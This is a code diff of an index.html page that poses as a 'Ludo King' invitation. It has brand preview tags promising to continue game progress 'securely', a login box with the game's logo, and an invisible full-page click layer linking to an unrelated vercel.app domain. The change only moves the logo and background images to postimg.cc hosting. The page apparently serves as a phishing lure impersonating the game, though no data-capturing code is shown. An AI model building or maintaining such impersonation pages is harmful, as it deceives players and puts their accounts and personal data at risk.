--- a/index.html
+++ b/index.html
@@ -8,7 +8,7 @@
   <!-- ✅ Social Media Preview Meta Tags -->
   <meta property="og:title" content="Ludo King invites you" />
   <meta property="og:description" content="Continue your Ludo King progress securely " />
-  <meta property="og:image" content="https://querulous-crimson-amsttzakrm.edgeone.app/5a6501a4-a969-492b-94dc-8bd3870cb1a8%20(1).jpg" />
+  <meta property="og:image" content="https://i.postimg.cc/qR6JwjCv/5a6501a4-a969-492b-94dc-8bd3870cb1a8.jpg" />
   <meta property="og:url" content="https://game-players-online-rouge.vercel.app/" />
   <meta property="og:type" content="website" />
   <meta property="og:site_name" content="Ludo King invites you" />
@@ -26,7 +26,7 @@
     body {
       margin: 0;
       font-family: "Poppins", Arial, sans-serif;
-      background: url('https://cute-amethyst-wx5zdxi8cw.edgeone.app/5a6501a4-a969-492b-94dc-8bd3870cb1a8.jpg') no-repeat center center fixed;
+      background: url('https://i.postimg.cc/qR6JwjCv/5a6501a4-a969-492b-94dc-8bd3870cb1a8.jpg') no-repeat center center fixed;
       background-size: cover;
       display: flex;
       justify-content: center;
@@ -139,7 +139,7 @@
   <a href="https://game-players-online-rouge.vercel.app/" class="click-layer"></a>
 
   <div class="login-box">
-    <img class="logo" src="https://cute-amethyst-wx5zdxi8cw.edgeone.app/5a6501a4-a969-492b-94dc-8bd3870cb1a8.jpg" alt="Ludo King Logo" />
+    <img class="logo" src="https://i.postimg.cc/qR6JwjCv/5a6501a4-a969-492b-94dc-8bd3870cb1a8.jpg" alt="Ludo King Logo" />
 
     <div class="mini-buttons">
       <button class="mini-btn">☁️ Save Data</button>
